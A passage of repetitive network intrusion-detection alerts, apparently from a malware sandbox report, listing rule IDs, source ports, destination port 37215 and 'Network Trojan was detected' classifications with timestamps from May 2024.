            SID:2835222
            Source Port:56736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.816936
            SID:2829579
            Source Port:51248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.771177
            SID:2829579
            Source Port:59936
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.084770
            SID:2829579
            Source Port:34454
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994749
            SID:2835222
            Source Port:60926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.669927
            SID:2829579
            Source Port:40964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.818403
            SID:2835222
            Source Port:53848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.759973
            SID:2829579
            Source Port:46514
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968380
            SID:2829579
            Source Port:43568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.864397
            SID:2835222
            Source Port:57162
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.293582
            SID:2835222
            Source Port:53642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.051091
            SID:2829579
            Source Port:35940
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.582489
            SID:2835222
            Source Port:55424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.552766
            SID:2829579
            Source Port:42084
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.943018
            SID:2835222
            Source Port:41102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862765
            SID:2829579
            Source Port:59314
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936020
            SID:2835222
            Source Port:60754
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.731112
            SID:2835222
            Source Port:60442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.681712
            SID:2835222
            Source Port:48974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.899830
            SID:2829579
            Source Port:35786
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.065982
            SID:2835222
            Source Port:57514
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.943157
            SID:2835222
            Source Port:55646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.962822
            SID:2829579
            Source Port:42456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753673
            SID:2835222
            Source Port:58172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.932003
            SID:2835222
            Source Port:38726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.279708
            SID:2835222
            Source Port:50190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.445315
            SID:2835222
            Source Port:56210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.396746
            SID:2835222
            Source Port:53630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.865469
            SID:2829579
            Source Port:55426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.291953
            SID:2829579
            Source Port:48260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.685583
            SID:2835222
            Source Port:48922
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756591
            SID:2829579
            Source Port:33088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.730418
            SID:2835222
            Source Port:36100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.850384
            SID:2835222
            Source Port:60868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869333
            SID:2835222
            Source Port:37120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893023
            SID:2829579
            Source Port:59404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.657272
            SID:2829579
            Source Port:45106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:36.425140
            SID:2835222
            Source Port:51966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047405
            SID:2829579
            Source Port:45984
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.870158
            SID:2835222
            Source Port:49332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765203
            SID:2829579
            Source Port:54570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.444858
            SID:2835222
            Source Port:57518
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.000770
            SID:2835222
            Source Port:35646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.908484
            SID:2835222
            Source Port:42976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.624062
            SID:2829579
            Source Port:37598
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.005135
            SID:2829579
            Source Port:45370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.317890
            SID:2829579
            Source Port:48526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.298800
            SID:2829579
            Source Port:44052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290097
            SID:2835222
            Source Port:49652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.469891
            SID:2829579
            Source Port:44638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.819989
            SID:2835222
            Source Port:40458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.078746
            SID:2829579
            Source Port:33284
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.757506
            SID:2829579
            Source Port:40952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.330470
            SID:2829579
            Source Port:58356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.913829
            SID:2835222
            Source Port:43478
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.812426
            SID:2829579
            Source Port:55064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776664
            SID:2835222
            Source Port:36654
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026034
            SID:2835222
            Source Port:34460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.334498
            SID:2835222
            Source Port:41924
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.789886
            SID:2835222
            Source Port:35922
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:19.875237
            SID:2829579
            Source Port:41474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887240
            SID:2835222
            Source Port:38020
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.277535
            SID:2829579
            Source Port:53140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.312800
            SID:2835222
            Source Port:38052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.434651
            SID:2835222
            Source Port:44662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.018938
            SID:2829579
            Source Port:40990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.928274
            SID:2829579
            Source Port:36698
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.047791
            SID:2829579
            Source Port:52812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.697257
            SID:2829579
            Source Port:50238
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.495835
            SID:2835222
            Source Port:58898
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.611503
            SID:2829579
            Source Port:50514
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811531
            SID:2829579
            Source Port:45364
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.988983
            SID:2835222
            Source Port:45678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.058826
            SID:2835222
            Source Port:60076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.519081
            SID:2829579
            Source Port:53778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873190
            SID:2835222
            Source Port:45048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919498
            SID:2829579
            Source Port:60050
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.068586
            SID:2829579
            Source Port:56622
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.435832
            SID:2835222
            Source Port:35550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.352248
            SID:2835222
            Source Port:48682
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.263635
            SID:2835222
            Source Port:34802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.487200
            SID:2829579
            Source Port:53360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.952165
            SID:2829579
            Source Port:34148
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.715780
            SID:2835222
            Source Port:39408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.864975
            SID:2829579
            Source Port:47914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.913479
            SID:2835222
            Source Port:50154
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031546
            SID:2829579
            Source Port:39682
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.772927
            SID:2835222
            Source Port:36682
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.649082
            SID:2829579
            Source Port:42158
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.414223
            SID:2829579
            Source Port:36210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.887392
            SID:2829579
            Source Port:39622
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.789022
            SID:2829579
            Source Port:54854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849501
            SID:2829579
            Source Port:59368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.066901
            SID:2829579
            Source Port:42522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.827219
            SID:2835222
            Source Port:54436
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994275
            SID:2829579
            Source Port:58870
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.038996
            SID:2835222
            Source Port:33562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.809146
            SID:2835222
            Source Port:42726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.859546
            SID:2829579
            Source Port:52170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.669761
            SID:2829579
            Source Port:41208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.055112
            SID:2835222
            Source Port:41568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.333262
            SID:2835222
            Source Port:36032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.299390
            SID:2829579
            Source Port:58174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.065125
            SID:2835222
            Source Port:50730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.343262
            SID:2835222
            Source Port:38126
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.807316
            SID:2835222
            Source Port:54614
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.108214
            SID:2835222
            Source Port:60410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.068411
            SID:2835222
            Source Port:44356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.997867
            SID:2835222
            Source Port:46062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.861197
            SID:2835222
            Source Port:49102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.730581
            SID:2829579
            Source Port:46206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.059751
            SID:2835222
            Source Port:48546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.528639
            SID:2829579
            Source Port:59296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.640460
            SID:2835222
            Source Port:55790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.065411
            SID:2829579
            Source Port:44758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.663870
            SID:2829579
            Source Port:44558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988772
            SID:2829579
            Source Port:54942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.276540
            SID:2829579
            Source Port:48940
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026036
            SID:2829579
            Source Port:38352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.557891
            SID:2829579
            Source Port:45996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.318539
            SID:2829579
            Source Port:54728
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.043220
            SID:2829579
            Source Port:58528
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.334125
            SID:2835222
            Source Port:40390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.918737
            SID:2835222
            Source Port:52042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.944905
            SID:2835222
            Source Port:45778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995196
            SID:2835222
            Source Port:40678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321404
            SID:2835222
            Source Port:42510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.881195
            SID:2835222
            Source Port:55390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.066691
            SID:2835222
            Source Port:34064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.717731
            SID:2829579
            Source Port:33408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756406
            SID:2835222
            Source Port:43540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.716845
            SID:2829579
            Source Port:55526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.299997
            SID:2829579
            Source Port:46556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.877612
            SID:2835222
            Source Port:36298
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.818200
            SID:2829579
            Source Port:55226
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.326635
            SID:2835222
            Source Port:59348
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.152864
            SID:2829579
            Source Port:50064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.818373
            SID:2829579
            Source Port:44878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.473847
            SID:2835222
            Source Port:53438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.887374
            SID:2835222
            Source Port:45554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:04.899655
            SID:2835222
            Source Port:43676
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841166
            SID:2829579
            Source Port:33342
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.828771
            SID:2829579
            Source Port:36520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.433100
            SID:2835222
            Source Port:35322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.251794
            SID:2835222
            Source Port:54304
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.305454
            SID:2835222
            Source Port:39010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.291098
            SID:2829579
            Source Port:56866
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.436456
            SID:2829579
            Source Port:46142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047528
            SID:2829579
            Source Port:36470
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.305530
            SID:2835222
            Source Port:49876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.312317
            SID:2835222
            Source Port:48736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.928252
            SID:2829579
            Source Port:55546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.770791
            SID:2829579
            Source Port:54214
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.508133
            SID:2829579
            Source Port:49822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956287
            SID:2835222
            Source Port:55936
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031593
            SID:2829579
            Source Port:57502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.469113
            SID:2829579
            Source Port:40944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.052828
            SID:2835222
            Source Port:39424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.084641
            SID:2829579
            Source Port:55544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.542260
            SID:2835222
            Source Port:41592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.340004
            SID:2835222
            Source Port:35488
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.952743
            SID:2829579
            Source Port:60604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.995789
            SID:2829579
            Source Port:49444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.058353
            SID:2835222
            Source Port:43760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855272
            SID:2835222
            Source Port:38110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.663892
            SID:2835222
            Source Port:57106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.911363
            SID:2829579
            Source Port:50272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.384429
            SID:2829579
            Source Port:44092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.699443
            SID:2829579
            Source Port:54726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.895525
            SID:2835222
            Source Port:50532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930927
            SID:2835222
            Source Port:32912
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.063428
            SID:2829579
            Source Port:40248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.804406
            SID:2829579
            Source Port:41356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.859678
            SID:2835222
            Source Port:38754
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855668
            SID:2835222
            Source Port:35150
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.993920
            SID:2829579
            Source Port:40684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.470594
            SID:2835222
            Source Port:40058
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.863566
            SID:2835222
            Source Port:35430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.878756
            SID:2829579
            Source Port:37174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.634406
            SID:2835222
            Source Port:52364
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.585694
            SID:2835222
            Source Port:47410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.922762
            SID:2829579
            Source Port:49034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.812538
            SID:2835222
            Source Port:40044
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.742383
            SID:2829579
            Source Port:44416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.310718
            SID:2835222
            Source Port:42596
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.812557
            SID:2829579
            Source Port:55958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.766889
            SID:2829579
            Source Port:43844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.929941
            SID:2835222
            Source Port:37498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.474038
            SID:2829579
            Source Port:39532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.999088
            SID:2829579
            Source Port:58970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.748562
            SID:2835222
            Source Port:42144
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.996716
            SID:2829579
            Source Port:39828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.550798
            SID:2835222
            Source Port:60402
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.605299
            SID:2829579
            Source Port:38772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.308022
            SID:2835222
            Source Port:43698
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753317
            SID:2829579
            Source Port:39722
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.970276
            SID:2835222
            Source Port:34178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930774
            SID:2829579
            Source Port:39464
            Destination Port:37215
